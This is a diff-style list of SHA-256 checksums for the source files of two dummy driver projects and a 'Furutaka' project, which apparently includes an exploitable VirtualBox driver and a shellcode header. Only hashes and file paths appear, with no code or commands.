+da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c
+c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
+2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj
+f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
+d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
+a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c
+cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h
+10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
+c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
+746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c
+3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h
+cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys
+01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln
+c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj
+b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
+2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user
+1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h
+c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c
+964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h
+8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c
+893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c
+bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h
+107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h
+b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Furutaka\minirtl\rtltypes.h
+e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13 *Source\Furutaka\minirtl\u64tohex.c
+4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5 *Source\Furutaka\minirtl\u64tostr.c
+f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107 *Source\Furutaka\minirtl\ultohex.c
+9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Furutaka\minirtl\ultostr.c
+83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52 *Source\Furutaka\minirtl\_strcat.c
+ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutaka\minirtl\_strcmpi.c
+969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8 *Source\Furutaka\minirtl\_strcpy.c
+27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c
+60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c
+87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a
*Source\Furutaka\minirtl\_strncmpi.c
+8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
+fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
+8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc
+a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h
+2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c
+d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h
+12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h